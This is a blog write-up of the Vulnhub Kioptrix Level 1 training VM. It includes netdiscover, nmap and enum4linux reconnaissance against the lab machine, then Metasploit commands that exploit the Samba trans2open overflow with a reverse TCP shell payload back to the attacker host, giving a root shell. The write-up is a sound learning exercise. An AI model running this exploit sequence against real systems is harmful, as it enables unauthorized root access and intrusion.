Vulnhub – Kioptrix: Level 1 (#1)

Kioptrix Level 1 is the first in the series of five. Point of the game is to get a root shell of the vulnerable machine. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. More info that comes from the author will be listed below with the link to download the VM here.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Without further ado, lets get started.

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover I was able to find out our victim with the ip address of 192.168.182.151

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, samba smbd on port 139, and rpcbind on port 111.

root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

Used nbtscan to scan for NetBIOS information.

Did a simple smb enumeration using enum4linux tool and found out the victim is running Samba 2.2.1a, which is vulnerable to Samba trans2open Overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151 

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability is listed below, which is from rapid7’s Vulnerability & Exploit Database.With that, I used the metasploit module exploit/linux/samba/trans2open to exploit this vulnerability.

Description- Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1

Conclusion

After getting root shell I found the flag in /var/spool/mail which said :
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”
.
Well it that’s it for level 1. It will only get harder from here. Next is Level 2.

4 comments

  1. I must say it was hard to find your website in google.
    You write awesome posts but you should rank your website higher in search engines.
    If you don’t know 2017 seo techniues search on youtube: how to rank a website Marcel’s way

    1. Thank you! When I do write ups I tend to be elaborate so that takes a significant amount of time than just a simple write up, that I tend to see a lot. It has proven to be resource to myself sometimes when I forget certain things and forgot how I did a certain attack or why I did it in the first place. Yes I will look into that to make my site easier to find. Appreciate it! Sorry for the late response been busy at the moment but now I am back.

Leave a Reply

Your email address will not be published. Required fields are marked *